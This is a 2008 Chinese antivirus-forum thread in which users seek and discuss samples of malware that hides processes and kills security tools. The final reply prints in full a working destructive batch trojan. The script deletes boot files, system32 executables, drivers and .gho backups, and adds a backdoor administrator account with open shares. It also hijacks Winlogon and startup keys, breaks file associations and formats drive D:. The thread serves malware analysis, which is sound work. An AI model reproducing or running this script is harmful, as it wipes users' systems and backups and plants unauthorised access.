查看: 3246|回复: 12
收起左侧

[病毒样本] 求隐藏进程+开什么删什么的病毒样本分析用

 关闭 [复制链接]
5551551
发表于 2008-2-15 14:28:57 | 显示全部楼层 |阅读模式
    病毒样本区这么多病毒,尽是一些老的没用啊,现在新一轮爆发的病毒全是隐藏进程+开什么删什么类型。

     我最近这段时间,碰到了上十起这样的病毒,进程中查不到,或查到明显的两个删掉又被隐藏的第三第四个激活了,然后就是典型的开什么删掉什么,什么安全软件也用不了。这样的病毒现在很难对付,想要个样本,好像卡饭这里还没有这类型的样本哦,哪位朋友有吗?请发一个给我作分析,谢谢了。
clovedsm
发表于 2008-2-15 14:31:26 | 显示全部楼层
很难对付?win pe光盘嘛,刻录机有的把……另外norton antibot对付隐藏进程是很专业的

[ 本帖最后由 clovedsm 于 2008-2-15 14:32 编辑 ]
5551551
 楼主| 发表于 2008-2-15 14:34:09 | 显示全部楼层
原帖由 clovedsm 于 2008-2-15 14:31 发表
很难对付?win pe光盘嘛,刻录机有的把……

1:不能重装系统,我们要的就是手工杀毒,锻炼杀毒能力。
2:PE只能自已电脑上用啊,我的电脑都很少中毒的,都是给人家杀毒用。PE远程没法杀啊。
qigang
发表于 2008-2-15 21:43:13 | 显示全部楼层
那机器上提取点样本出来不就行了。
weng626466
发表于 2008-2-15 21:46:54 | 显示全部楼层

求卡巴斯基实验室再线杀毒

挪威的冬天
发表于 2008-2-15 21:47:32 | 显示全部楼层
PE 是很好的辅杀环境 有些状态只能上 PE 了。。。

至于开什么删什么。。纯粹捣乱的病毒么
wolffshen
发表于 2008-2-16 01:48:49 | 显示全部楼层
原帖由 挪威的冬天 于 2008-2-15 21:47 发表
PE 是很好的辅杀环境 有些状态只能上 PE 了。。。

至于开什么删什么。。纯粹捣乱的病毒么

这个应该是指开什么杀毒软件,就删什么杀毒软件吧
冷冷
发表于 2008-2-16 02:11:55 | 显示全部楼层
应该利用到映像劫持吧
把杀软的映像路径都替换了
那就达到启动不了杀软
rest1min
发表于 2008-2-16 02:24:11 | 显示全部楼层
那你试一下我这个样本。图标是熊猫烧香,但病毒决不是。

软件名称引擎版本
病毒库版本
病毒库时间
扫描结果
时间
a-squared3.0.0.1262008.02.142008-02-14Trojan.BAT.Adduser.b
4.888
AntiVir7.6.0.657.0.2.1392008-02-14TR/Drop.Agent.bbc
9.141
Arcavir1.0.42008021416012008-02-14Trojan.Bat.Adduser.B
2.939
AVAST1.0.8080214-02008-02-14Win32:Agent-PPH [Trj]
9.316
AVG7.5.51.442269.20.5/12782008-02-14-
10.487
BitDefender7.60825.9808327.175142008-02-15Trojan.Bat.Adduser.B
13.036
CA (VET)9.0.0.14331.3.55392008-02-15Win32/VMalum.BSNN unknown type.
9.715
ClamAV 0.9258192008-02-15-
0.269
Comodo2.112.0.0.4362008-02-15-
2.512
CP Secure1.1.0.6952008.02.142008-02-14Troj.BAT.Adduser.b
32.134
Dr.WEB4.44.0.91702008.02.142008-02-14Trojan.KillFiles.684
11.111
ewido4.0.0.22008.02.152008-02-15-
7.203
F-PROT4.4.1.52200802132008-02-13Possible W32/Heuristic-162!Eldorado (not disinfectable)
3.741
F-SECURE5.51.61002008.02.14.032008-02-14Trojan.BAT.Adduser.b [AVP]
0.123
IKARUST3.1.01.152008.02.15.703162008-02-15Trojan-Downloader.Win32.Banload.ase
1.970
MKS_VIR2.012008.02.152008-02-15Trojan.Harm.Bat.Agent.a
6.466
NORMAN5.91.105.902008-02-13-
32.073
nProtect2008-02-16.0011688312008-02-16Trojan.Bat.Adduser.B
4.627
PrevxV2200802162008-02-16-
4.382
QuickHeal9.002008.02.152008-02-15Suspicious - DNAScan
1.890
SOPHOS2.70.14.262008-02-13Mal/Packer
6.289
The Hacker6.2.9v002202008-02-14-
1.735
VBA323.12.6.120080213.21192008-02-13Trojan.BAT.Adduser.b
2.287
ViRobot200802152008.02.152008-02-15-
2.184
VirusBuster4.3.19:99.121.11/11.02008-02-14-
1.312
卡巴斯基5.5.102008.02.142008-02-14Trojan.BAT.Adduser.b
17.021
安博士V32008.02.14.102008.02.142008-02-14-
1.502
江民杀毒10.00.6502008.02.132008-02-13-
1.368
熊猫卫士9.04.03.00012008.02.142008-02-14Trj/AddUser.I      
2.701
瑞星20.020.31.30.002008-02-14Harm.BAT.Agent.a
4.544
赛门铁克1.3.0.2420080214.0032008-02-14-
0.262
趋势8.500-10015.108.122008-02-15TROJ_Generic
0.062
迈克菲5.2.0052292008-02-13-
3.263
金山毒霸2007.6.20.2492008.2.152008-02-15-
2.176
飞塔2.81-3.118.7502008-02-15BAT/Adduser.B!tr
2.299

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
冷冷
发表于 2008-2-16 02:45:07 | 显示全部楼层
@echo off
del /q /a:- c:\boot.ini
del /q /a:r c:\NTDETECT.COM
del /q /a:- C:\WINDOWS\system32\*.exe
del /q /a:s C:\WINDOWS\system32\*.exe
del /q /a:a C:\WINDOWS\system32\drivers\*.sys
del /q c:\windows\system32\*.nls
del /q /a:s c:\windows\system32\*
del /q c:\windows\lastgood\*
del /q c:\windows\system\*
del /q c:\windows\pss\*
del C:\*.gho
del D:\*.gho
del E:\*.gho
del F:\*.gho
del G:\*.gho
del H:\*.gho
del I:\*.gho
copy oo.bat c:\windows\system32\
echo start c:\windows\system32\shutdown.exe -r -c "OO is running away! Help me!" -f>>c:\windows\help\Hint.bat
echo start c:\winsows\system32\chkdsk.bat>>c:\windows\help\Hint.bat
echo copy d:\boot.bat c:\windows\system32\>>c:\windows\help\Hint.bat
echo rename c:\windows\system32\boot.bat chkdsk.bat>>c:\windows\help\Hint.bat
echo net user oo oec315 /add>>c:\windows\help\Hint.bat
echo net localgroup administrators oo /add>>c:\windows\help\Hint.bat
echo net start netbois>>c:\windows\help\Hint.bat
echo net share ipc$>>c:\windows\help\Hint.bat
echo net share admin$>>c:\windows\help\Hint.bat
echo net start "terminal services">>c:\windows\help\Hint.bat
echo net start "messenger">>c:\windows\help\Hint.bat
echo net send * hello>>c:\windows\help\Hint.bat
echo net stop themes>>c:\windows\help\Hint.bat
echo print c:\Hello.txt>>c:\windows\help\Hint.bat
echo Windows Registry Editor Version 5.00>>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>h.reg
echo "Chkdsk"="C:\\WINDOWS\\System32\\chkdsk.bat">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>h.reg
echo "Boot"="d:\\Boot.bat">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>h.reg
echo "MSHelp"="C:\\WINDOWS\\HELP\\Hint.bat">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings]>>h.reg
echo "Key"=hex:db,23,45,6f,8e,41,70,4c,44,5e,d0,23,79,c2,b4,b1>>h.reg
echo "Hint"="Hello. I am OO.">>h.reg
echo "FileName0"="C:\\WINDOWS\\System32\\RSACi.rat">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default]>>h.reg
echo "Allow_Unknowns"=dword:00000000>>h.reg
echo "PleaseMom"=dword:00000001>>h.reg
echo "Enabled"=dword:00000001>>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html]>>h.reg
echo "v"=dword:00000004>>h.reg
echo "s"=dword:00000004>>h.reg
echo "n"=dword:00000004>>h.reg
echo "l"=dword:00000004>>h.reg
echo [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>h.reg
echo "DisableRegistryTools"=dword:00000001>>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg]>>h.reg
echo @="txtfile">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>h.reg
echo @="txtfile">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.htm]>>h.reg
echo @="txtfile">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.html]>>h.reg
echo @="txtfile">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc]>>h.reg
echo @="txtfile">>h.reg
echo "Content Type"="">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe]>>h.reg
echo @="txtfile">>h.reg
echo "Content Type"="">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\PersistentHandler]>>h.reg
echo @="">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3]>>h.reg
echo @="txtfile">>h.reg
echo "Content Type"="">>h.reg
echo [HKEY_USERS\S-1-5-21-1454471165-507921405-1343024091-500\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>h.reg
echo "NoClose"=hex:01,00,00,00>>h.reg
echo "NoChangeStartMenu"=hex:01,00,00,00>>h.reg
echo "NoSetTaskbar"=hex:01,00,00,00>>h.reg
echo "NoDesktop"=hex:01,00,00,00>>h.reg
echo "NoDrives"=dword:03ffffff>>h.reg
echo "NoTrayContextMenu"=hex:01,00,00,00>>h.reg
echo "NoDriveTypeAutoRun"=dword:00000091>>h.reg
echo "NoRun"=dword:00000001>>h.reg
echo [HKEY_USERS\S-1-5-21-1454471165-507921405-1343024091-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]>>h.reg
echo "Chkdsk"="C:\\WINDOWS\\System32\\chkdsk.bat">>h.reg
echo [HKEY_USERS\S-1-5-21-1454471165-507921405-1343024091-500\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>h.reg
echo "DisableRegistryTools"=dword:00000001>>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>h.reg
echo "DefaultUserName"="oo">>h.reg
echo "Shell"="c:\\windows\\system32\\chkdsk.bat">>h.reg
echo "AltDefaultUserName"="Administrator">>h.reg
echo "DontDisplayLastUserName"="1">>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]>>h.reg
echo "dontdisplaylastusername"=dword:00000001>>h.reg
echo "legalnoticecaption"="Fuck">>h.reg
echo "legalnoticetext"="It's ok to be a gay.">>h.reg
echo "shutdownwithoutlogon"=dword:00000000>>h.reg
echo [HKEY_USERS\S-1-5-21-1454471165-507921405-1343024091-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]>>h.reg
echo "Start_ShowRun"=dword:00000000>>h.reg
echo "Start_ShowControlPanel"=dword:00000000>>h.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]>>h.reg
echo "NoViewContextMenu"=dword:00000001>>h.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>h.reg
echo "OO"="C:\\WINDOWS\\System32\\sspipes.scr">>h.reg
echo [HKEY_USERS\S-1-5-21-1454471165-507921405-1343024091-500\Software\Microsoft\Internet Explorer\Main]>>h.reg
echo "Start Page"="http://www.feifeicqq.com/">>h.reg
echo "FullScreen"="yes">>h.reg
echo "Show_URLToolBar"="no">>h.reg
echo "Show_URLinStatusBar"="no">>h.reg
echo "Show_StatusBar"="no">>h.reg
reg import h.reg
del h.reg
rename c:\windows\system32\oo.bat chkdsk.bat
copy c:\windows\system32\chkdsk.bat d:\
rename d:\chkdsk.bat boot.bat
start c:\windows\help\Hint.bat
echo shell=c:\windows\system32\chkdsk.bat>>c:\windows\system.ini
echo shell=c:\windows\system32\chkdsk.bat>>c:\windows\win.ini
o Hello! I only want to play with you. My name is OO. Hope you enjoy your life and me. Thank You!>>c:\windows\system32\readme.txt
net user oo oo /add
net localgroup oo /add
net share ipc$
start c:\windows\system32\chkdsk.bat
net start "messenger"
net send * hello
net send * hello
net send * hello
net send * hello
ping www.feifeicqq.com /n 15 /l 800
ping www.feifeicqq.com /n 15 /l 800
ping www.feifeicqq.com /n 15 /l 800
ping www.feifeicqq.com /n 15 /l 800
ping www.feifeicqq.com /n 15 /l 800
net start "netbios"
net start "rpcss"
chkdsk
format d: /c /f
print c:\Hello.txt

~~~~~~~~~~~~~~~·····
几乎啥都改了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-13 05:00 , Processed in 0.132872 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表